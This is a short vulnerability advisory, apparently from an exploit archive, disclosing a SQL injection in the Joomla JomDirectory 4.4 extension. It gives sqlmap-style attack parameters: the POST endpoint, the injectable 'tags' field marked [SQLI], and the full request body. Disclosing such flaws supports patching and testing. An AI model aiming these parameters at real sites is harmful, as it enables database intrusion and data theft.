Joomla JomDirectory 4.4 SQL Injection

Joomla JomDirectory extension version 4.4 suffers from a remote SQL injection vulnerability.


MD5 | 2ceb1c650e02edc5c1876040b2a11a73

################################################
#Title: Joomla JomDirectory 4.4 - SQL Injection
#Credit: Bilal KARDADOU
#Vendor: http://comdev.eu/jomdirectory/
#URL: https://extensions.joomla.org/extensions/extension/directory-a-documentation/directory/jomdirectory/
#Product: 'Joomla JomDirectory 4.4'
#Developer: Comdev
#Extension type: Plugin
#Last updated: Oct 29 2017
#Compatibility: 3.X
#Type: Paid download
#Google Dork: N/A
################################################
#
# Description:
# Building your own business directory site is now easy and quick! Increase user experience of your business directory website with the most versatile extension # that smoothly integrates with Joomla.
#
# --Method=POST -p [tags]
#
# -u "http://127.0.0.1/joomla/index.php?option=com_jomcomdev&task=maps.items&format=json&extension=com_jomdirectory&limit=100"
#
# --data="address-lat-lng=&distance=25&latitude=&longitude=&tags=[SQLI]&search=&categories_id=134&favorites=0&featured=0&93a3a2bbe8ed22d8e8e8584b39cc1834=1&"
# PoC:
# https://prnt.sc/hurom8
#
# Momo Martin Machi rajel Tetouani 7a9ir
# Bilal KARDADOU - https://www.linkedin.com/in/kardadou/)
################################################

Related Posts

Comments